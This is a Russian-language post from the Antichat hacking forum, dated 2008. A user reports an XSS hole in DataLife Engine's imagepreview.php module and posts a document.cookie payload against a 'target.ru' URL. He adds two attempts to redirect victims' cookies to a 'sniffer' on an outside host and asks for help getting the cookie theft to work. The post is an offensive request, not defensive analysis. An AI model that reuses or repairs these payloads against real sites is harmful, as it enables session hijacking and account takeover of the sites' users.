ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу XSS в DataLife Engine. Обсуждение.
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

XSS в DataLife Engine. Обсуждение.
  #1  
Старый 02.08.2008, 13:12
Аватар для Dr.Bodja
Dr.Bodja
Познающий
Регистрация: 27.08.2006
Сообщений: 52
Провел на форуме:
338724

Репутация: 15
По умолчанию XSS в DataLife Engine. Обсуждение.
Есть уязвимость
Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.cookie);
Нужно прилепить сниффер, чтобы куки на сниффер шли.

Пробывал так
Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location="http://site.ru/s.gif?"+document.cookie);
И так
Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location("http://site.ru/s.gif?"+document.cookie));
Подскажите что я делаю не так, и как нужно. Или это вообще невозможно?

ЗЫ: Если подобная тема уже есть, прошу эту удалить, и дать ссылку на более ранею.

Зарание спасибо за помощь.

С ув. DrBodja.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Сценарии/CMF/СMS 7 04.02.2010 02:55
DataLife Engine v.7.0 Nulled *DeViL* ПО для Web разработчика 3 04.05.2008 14:36
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ